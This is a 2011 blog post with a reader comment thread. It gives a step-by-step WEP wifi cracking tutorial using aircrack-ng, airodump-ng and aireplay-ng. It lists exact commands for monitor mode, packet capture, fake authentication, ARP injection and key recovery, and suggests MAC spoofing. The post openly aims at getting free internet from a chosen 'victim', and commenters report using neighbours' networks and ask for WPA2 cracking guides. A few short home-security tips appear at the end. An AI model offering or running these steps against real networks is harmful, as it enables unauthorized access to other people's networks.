Wednesday, April 20, 2011

Hacking Wifi WEP

Finally, something you guys have been all waiting for. Alot of people complain to me, "How do I get free internet"? Well the answer is, "there is no such thing as free internet". However many people in New York City uses wifi. And many of the people who use wifi aren't using a good enough security method. They choose to use WEP encryption but WEP has some major flaws in its design. With these flaws, someone can easily "hack" it and get their wifi password. Here's how:

*I'm assuming that you will be using BT4 R2 for this tutorial

We open the WICD Network manager to search for any nearby networks that use WEP encryption. The Access Point connection should be around 50% or better or else we can't inject.

1. Start by opening the terminal. We are going to be using Aircrack, Aireplay, Airmon, and Airodump.

Airmon- help sets your wireless card into monitoring mode
Airodump- helps us capture packets from a wireless router(AP)
Aireplay- helps us forge ARP request
Aircrack- decrypts WEP keys

2. We start be setting our wireless card into monitoring mode. We want to type this into the terminal:

"airmon-ng start 'your wireless interface'"
note: to see your wireless interface, you can type into the terminal "ifconfig -a" and look for the wireless one

in my case:
"airmon-ng start wlan0"

3. Now we are going to start sniffing around for some traffic:

"airodump-ng 'interface'"

in my case:
"airodump-ng mon0"

4. We should see some wireless traffic nearby. Once we get enough traffic we want to press CTRL+C to stop capturing all the wireless traffic. Now we choose a victim who has used a poorly secured wifi. We want to choose someone who is using WEP encryption in this tutorial. We are going to want to write down the BSSID, and Channel. Now we type into the terminal:

"airodump-ng -c 'channel' --bssid 'BSSID' -w 'filename' 'interface'"

in my case:
"airodump-ng -c 6 --bssid 00:12:0E:4E:58:62 -w wep mon0

5. Now we are going to open a new terminal. In the new terminal we are going to type:

"aireplay-ng -1 1 -a 'BSSID' 'interface'"
note: if you see a smiley face, that means you have a successful faked authentication. If not, you may too far from the access point to fake authentication or your MAC is being ignored. You can change your MAC with macchanger tool.

in my case:
"aireplay-ng -1 1 -a 00:12:0E:4E:58:62 mon0"


 6. Now to speed up the process, open a new terminal and type:



"aireplay-ng -3 -b 'BSSID'"

in my case:
"aireplay-ng -3 -b 00:12:0E:4E:58:62 mon0"

7. Now go to terminal in step 4 (the one that monitors the traffic ) and under the DATA column, make sure you have at least 10,000 data packets. You may need more data packets than 10,000 but just keep trying at every 5,000 interval. Now in a new terminal type:


"aircrack-ng 'filename-number.cap'"


in my case:

"aircrack-ng wep-01.cap"

If you get a failed message and it asks you to try again after receiving 5,000 more packets, press CTRL+C stop aircrack. Then type in the same command after 5,000 more packets to reattempt aircrack.

The password will have semicolons but just take away the semicolons and that is the password. All this can be done in less than 5 minutes showing you how weak and flawed WEP encryption is.

Things to know:
1. To secure your home or work WiFi, you should you WPA encryption with a strong password consisting of lower and capital case letters, numbers and symbols.
2. Use MAC authentication to secure your router from unwanted users.
3. It helps if you set your BSSID to invisible so your Access Point becomes less of a target.

Note: To access your routers setting, go to your web browser and type in "192.168.1.1" and hit enter.

Comment and Subscribe/Follow. And make sure to tell your friends and family to secure their wireless network.





12 comments:

  1. This actually works! It told me all night but now I can have four bars or free wifi.

    ReplyDelete
  2. what about WPA2 do you have instructions?

    ReplyDelete
  3. @anonymous read my firefox portable post and the comment there. Also if your read my post "to all hacking hamster members", you would understand my situation. Anyways, I will soon post instructions on how to hack your WPA2 network's key.

    ReplyDelete
  4. ok i admit.. you've made me a true believer lol. i can hardly wait to read your next blog. these tutorials are so awesome. thank you

    ReplyDelete
  5. I only have wpa. When u teach us??

    ReplyDelete
  6. The final command, aircrack-ng filename-number.cap

    What number do I fill in...?? Where do I get that number....??

    ReplyDelete
  7. Screw that I found out....it totally worked man....cant wait for your WPA guide.....

    ReplyDelete
  8. Hey, sometimes i have this issue....sometimes I am able to hack the passwords....but sometimes after typing in

    airodump-ng -c 6 --bssid 00:12:0E:4E:58:62 -w wep mon0

    the data column never ever rises....it stays at zero, why is it such...??

    ReplyDelete
  9. @Kenneth Dave
    Sometimes you may be too far away from the access point to receive any data or even to inject packets. Also, maybe the router doesn't recognize your MAC so it ignores you. That may be some reasons why you can't get the data on the data column. Another possible reason: are you on the right channel?

    ReplyDelete
  10. i only have wpa, is that the same?

    ReplyDelete
  11. Helen wpa is not easy to crack you need wep only, when using aircrack those that are unsure about the file name just drag the .cap or .ivs file into the new terminal window and hit enter

    ReplyDelete
  12. I going to work on wap, as soon as i have time. I is a lot harder to crack but it is possible.

    ReplyDelete